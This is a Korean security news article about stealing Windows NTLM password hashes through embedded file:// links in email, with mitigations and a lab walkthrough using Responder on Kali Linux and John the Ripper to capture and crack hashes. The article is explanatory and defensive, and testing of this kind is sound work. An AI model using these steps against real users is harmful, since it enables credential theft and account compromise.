해커즈뉴스 / 해커대학

Donation bitcoin(기부용 비트코인 주소)

 
1Pq3K39XM5xx4CifGKgppXeavtWNNHH7K4
 
기부하신 비트코인은 "보안 취약 계층"을 위해 사용되고 있습니다.
 
 

Donation bitcoin(기부용 비트코인 주소)

 
1Pq3K39XM5xx4CifGKgppXeavtWNNHH7K4
 
기부하신 비트코인은 "보안 취약 계층"을 위해 사용되고 있습니다.
 
  ▒   [해커대학 - hackers college]   ▒  

작성자: 해커즈뉴스
장르: 이슈
2019/1/23(수)
조회: 125
"전문가도 속수무책" 이메일로 비밀번호 해시 훔쳐서 해킹  
필자는 수개월 전, 회사 동료이자 친구인 케빈 미트닉과 비밀번호 정책에 대해 논쟁을 벌였다. 열띤 토론에서 케빈은 필자를 포함한 대부분의 전문가가 권장하는 것보다 훨씬 더 긴 비밀번호를 사용해야 한다고 주장했고 필자는 케빈의 주장을 수긍하지 않았다.

이후 케빈은 필자에게 이메일을 하나 보냈는데, 이 이메일을 열자 케빈에게 필자의 마이크로소프트 윈도우 비밀번호 해시가 전송됐고 캐빈은 이 해시를 크랙했다. 완전한 KO패였다. 필자는 이런 공격이 가능하다는 사실조차 몰랐다.
 
ⓒ Getty Images Bank 

단순히 공격의 존재를 몰랐다는 것보다 더 충격적인 점은 수년 전부터 이미 광범위하게 알려진 공격이라는 사실이다. 컴퓨터 보안 전문가 관점에서도 부끄럽지만 필자는 명색이 윈도우 인증 전문가로서 두 배로 부끄러운 노릇이다. 이 사건 이후 알아보니, 대부분의 컴퓨터 보안 전문가는 이런 공격이 가능하다는 사실을 몰랐다. 

이와 같은 비밀번호 해시 크랙이 가능한 이유는 특정 상황에서(이 상황은 만들기 쉽다) 이메일에 내장된 링크를 통해 컴퓨터에서 원격 서버로 인증을 시도한다는 데 있다. 그러면 원격 서버는 컴퓨터의 인증 시도를 포착하고, 이 정보를 사용해 비밀번호 해시를 찾아 크랙할 수 있다.

간단히 정리하면 필자가 독자들에게 이메일을 보내 비밀번호 해시를 알아낸 다음, 이 해시를 일반 텍스트 비밀번호로 크랙할 수 있다는 이야기다.


이메일을 통해 비밀번호 해시를 알아내는 것이 가능한 이유

컴퓨터는 소프트웨어를 통해 웹 서버 연결을 시도할 때 기본적으로 인증 없이 연결을 시도하는 경우가 많다. 한 번 이상 연결에 실패하면 컴퓨터는 보통 현재 활성 로그온 인증 정보를 사용해 로그온하라는 요청을 받게 된다. 윈도우 통합 인증을 지원하는 컴퓨터는 사용자의 윈도우 인증 정보를 사용해 자동으로 로그온을 시도할 수 있다. 사용자는 무슨 일이 일어났는지 모른다. 자동화된 인증이 실패하면 이후 사용자에게 수동 로그온 메시지가 표시된다.

자동 통합 윈도우 인증은 특히 로컬 리소스 및 이전에 신뢰성이 확인된 서버에서 꼭 필요한 싱글사인온(SSO) 기능이다. 이 기능은 사용자가 다른 서버에 연결할 때마다 로그온 인증 정보를 제출할 필요없이 회사 환경 전체에서 웹 서버에 연결할 수 있게 해준다. 현재 널리 사용되는 브라우저는 대부분 다양한 범위에서 이 기능을 지원한다.

1990년대 후반 악성 해커들은 이 기능을 악용해 사용자의 윈도우 인증 정보를 캡처했다. 사용자에게 이메일을 보내서 링크를 클릭하도록 유도하면(또는 투명한 1픽셀로 만들어진 내장된 웹 비컨을 사용해 사용자의 이메일 클라이언트가 사용자 모르게 응답하도록 함) 사용자의 컴퓨터는 무단 서버에 보이지 않게 연결된다. 윈도우 통합 인증이 활성화된 경우(대부분 활성화되어 있음) 사용자의 컴퓨터는 무단 원격 웹 서버에 사용자의 회사 인증 정보를 전송한다.

정확히 말하면 전송되는 것은 사용자의 LAN 매니저(LM) 또는 윈도우 NT LM 네트워크 인증 시도 응답(challenge response)이다. 이 정보에서 사용자의 LM 또는 NT 해시를 계산할 수 있다.

마이크로소프트는 이에 대응해 사용자의 윈도우 인증 정보를 로컬 네트워크 외부의 서버로 보내는 기본 동작을 비활성화했다. 마이크로소프트는 인터넷 익스플로러 버전 4~5를 전후해서 새로운 기본 기능을 활성화했으며 지금까지도 인터넷 익스플로러의 고급 구성 설정에서 열 수 있다(인터넷 옵션, 고급, 통합된 윈도우 인증 사용). 이 조치로 해당 공격이 차단됐고 필자도 그렇게 믿었다.

그러나 알고 보니 윈도우(및 다른 윈도우 통합 인증 지원 소프트웨어 프로그램, 예를 들어 구글 크롬 등)를 속여 NTML 네트워크 인증 시도를 원격 서버로 보내도록 하는 방법은 여전히 존재한다. 필자가 아는 한 사례는 file:///// 형식으로 된 내장 링크를 사용한다. 예를 들면 다음과 같다.

file:////contoso.com/index.html

contoso.com을 유효한 원격 서버 도메인 이름으로 바꾸면 소프트웨어는 TCP 포트 445를 통해 NTLMv2 연결(기본값)로 SMB/NetBIOS를 사용해서 원격 서버에 인증을 시도한다. 유효한 SMB/NetBIOS 시도로 NTLMv2 연결에 응답할 수 있는 NetBIOS 리스너가 실행되고 있다면 서버는 클라이언트의 NTLMv2 시도 응답을 받는데, 여기서 사용자의 NT 해시를 계산할 수 있다. 여기까지 왔다면 그 다음은 해시를 크랙하거나 시도와 응답을 다시 수행해서 다른 원격 우회를 시도하거나, 선택의 문제일 뿐이다.

TCP 포트 445의 아웃바운드를 차단하지 않은 한, 인터넷 익스플로어에서 윈도우 통합 인증이 어떻게 설정돼 있든 관계없이 이 방법은 통한다. 케빈이 이를 입증한 이후 많은 사람이 필자에게 더 자세한 내용을 묻기 위해 연락을 했다. 당시에는 자세한 부분을 알지 못했지만 그 사이 여러 테스트를 통해 지금은 어떤 방법이 통하고 통하지 않는지 웬만큼 파악했다.

물론 가장 중대한 발견은 내장 file://// 링크를 클릭하면 자신의 NTLM 시도 응답이 원격 서버로 전송되고, 거기서 NT 해시가 크랙될 수 있다는 것이다. 이 방법은 다음 조건에서 통한다.

- 로컬 네트워크 및 인터넷을 통해 원격으로
- 완벽하게 패치된 시스템의 기본 구성에서
- 윈도우 방화벽 기본 상태에서
- 로컬 SAM 계정과 액티브 디렉터리 계정에서 모두


원격 공격자는 컴퓨터 이름, 도메인 이름, NTLMv2 시도 응답을 손에 넣는다. 좋지 않은 소식이지만, 대부분의 기업 환경에서 이 공격 방법이 통한다.


이 공격에 대응할 수 있는 해결책

좋은 소식은 완전히 패치된 시스템에서 이메일을 열더라도 그 안의 링크를 클릭하지만 않으면 어떠한 공격도 통하지 않는다는 것이다. 마이크로소프트의 어느 패치에는 마이크로소프트 오피스 365의 RTF 이메일을 사용할 경우, 성공할 수 있는 오래된 공격 방법이 언급되어 있지만 지금은 이 경로도 막힌 것으로 보인다. 다행이다. 단순히 이메일을 여는 것만으로 공격에 이용당하는 상황은 누구도 원치 않는다. 다만 모두가 알다시피 사용자에게 클릭을 유도하기란 그다지 어려운 일이 아니다. 하지만 일단 클릭하면 해당 사용자의 회사 비밀번호가 유출될 수 있다.

필자의 또 다른 친구이며 유능한 사이버보안 분석가인 롭 톰킨스는 직접 여러가지 테스트를 했다. 톰킨스는 필자가 발견한 사항을 확인하고 다양한 소프트웨어 프로그램에서 이를 테스트했는데, 몇 가지 흥미로운 결론에 도달했다. 가장 중요한 점은 회사 네트워크에서 무단 아웃바운드 SMB/NetBIOS 연결을 차단하기 위해 TCP 포트 445를 막는다 해도 모바일 디바이스의 로컬 방화벽에서 이 포트를 닫지 않은 경우 해당 디바이스가 회사 네트워크를 벗어나 있을 때 NTLM 시도 응답을 성공적으로 전송할 수 있다는 것이다. 중요한 발견이다. 롭은 에일리언볼트(AlienVault) 규칙/서명이 이러한 유형의 공격을 인식해서 고객을 보호한다는 사실도 발견했다.


마이크로소프트 패치 설치

마이크로소프트는 2017년 11월 윈도우 10, 윈도우 서버 2016에만 제공되는 패치와 레지스트리 설정을 게시했다. 이 설정을 위해서는 윈도우 방화벽을 활성화하고 NTLM SSO를 사용하도록 허용되는 네트워크와 허용되지 않는 네트워크를 정의해야 한다. 이와 같은 요구 사항은 곧 많은 조직이 이 설정을 사용할 수 없음을 의미한다. 또한 출처는 불분명하지만 회사에서 허용되는 네트워크를 정확히 정의하지 않았다가 서비스가 중단되는 사태를 겪었다는 이야기도 돌고 있으니, 사용하려면 철저한 테스트와 신중한 접근이 필요하다.


강한 비밀번호 사용, 무단 인증 포트 차단

아무리 강력한 비밀번호 크랙 툴이라도 크랙할 수 없을 만큼 충분한 엔트로피의 강력한 비밀번호가 최선이다. 강력한 비밀번호가 1차 방어선이 되어야 한다. 또한 일반적인 필터링 방법을 사용해 SMB/NetBIOS 등 승인되지 않은 송신 인증을 차단하는 것은 당연하고, file:////도 필터링하는 것이 좋다.


이 취약점을 테스트하는 방법

조직과 조직에서 사용하는 소프트웨어가 얼마나 취약한지 확인하려면 윈도우 클라이언트와 리눅스 서버, 두 개의 컴퓨터로 구성된 실험실을 간단히 설정해 바로 테스트를 시작할 수 있다. 방법은 다음과 같다.

먼저 로렌트 재피의 파이썬 기반 리스폰더(Responder)라는 유틸리티를 받는다. 리스폰더는 네트워크 기반 비밀번호 해시의 도난 상황을 살피기 위한 매우 유용한 툴로, LLMNR(마이크로소프트 윈도우 로컬 이름 확인 프로토콜), NetBIOS 및 멀티캐스트 DNS(mDNS)를 자동으로 '오염'시킬 수 있는 무단 서버(웹, NetBIOS, SQL, FTP, LDAP) 역할을 한다. 인터넷에서 리스폰더를 사용해서 NTLM 시도 응답을 오염시켜 포착하는 사람들의 동영상을 많이 찾아볼 수 있다.

리스폰더를 적절히 설정하는 데 소비되는 시간을 아끼려면 칼리 리눅스(Kali Linux)를 다운로드해서 실행하고 다음과 같이 설정한다.

1. root로 로그인한다. 비밀번호는 toor다.
2. 애플리케이션(Applications) 메뉴를 클릭하고 09-스니핑 및 스푸핑(09 - Sniffing and Spoofing)을 선택한 다음 리스폰더를 실행한다.
3. 그런 다음 responder -I eth0 –v(수신 대기하는 IP 주소를 기록)를 실행한다.

윈도우 컴퓨터에서는
1. 파일 탐색기를 열고  file://///test.htlm(다른 파일 이름이라도 무관함)에 연결한다.
2. 리스폰더가 NTML 시도 응답을 획득한다.

해시를 크랙하려면 리눅스 컴퓨터로 돌아가서 다음과 같이 한다.
1. 터미널 세션을 시작한다.
2. cd /usr/share/responder/logs를 입력한다.
3. 존 더 리퍼(John the Ripper)를 실행해서 로그 파일의 해시를 크랙한다.

john HTTP-NTLMv2… or john SMB….

해킹은 정말 재미있다. 해킹 툴을 사용해 되는 것과 안 되는 것을 탐색하는 것만큼 재미있는 일도 없다. 물론 필자는 이메일의 내장된 링크를 클릭하면 안 된다는 것을 배웠으니 앞으로 그럴 일은 절대 없을 것이다. 클릭했다가는 다치는 수가 있다. 


  이름   메일   관리자권한임
  내용 입력창 크게
                    답변/관련 쓰기 폼메일 발송 수정/삭제     이전글 다음글    
번호장르제 목작성일
8759 사건사고    서울시체육회 및 자치구 체육회 홈페이지 해킹 당했었다 2019/01/24
8758 이슈    파이어아이 “中 해커, 아래아한글 취약점 분석.. 첨부 이메일 해킹 가능성” 2019/01/24
8757 이슈    "전문가도 속수무책" 이메일로 비밀번호 해시 훔쳐서 해킹 2019/01/23
8756 사건사고    核 미사일 3발 미국 향하고 있다 2019/01/23
8755 사건사고    서울시 26개 체육회 홈피 해킹…경찰 내사 착수 2019/01/23
8754 이슈    경남은행 위례신도시지점, 수입업체 이메일 해킹 무역사기 피해 예방 2019/01/23
8753 사건사고    이메일 주소·비밀번호 27억개 유출 2019/01/22
8752 이슈    2018년, 해커들이 가장 많이 사용했던 취약점은 무엇일까? 2019/01/22
8751 사건사고    시스코 스위치, CVE-2018-15439 취약점으로 해킹 가능해...주의 2019/01/22
8750 이슈    와이파이 펌웨어 취약점, 62억개 디지털 장치 해킹 위험...주의 2019/01/22

 
목록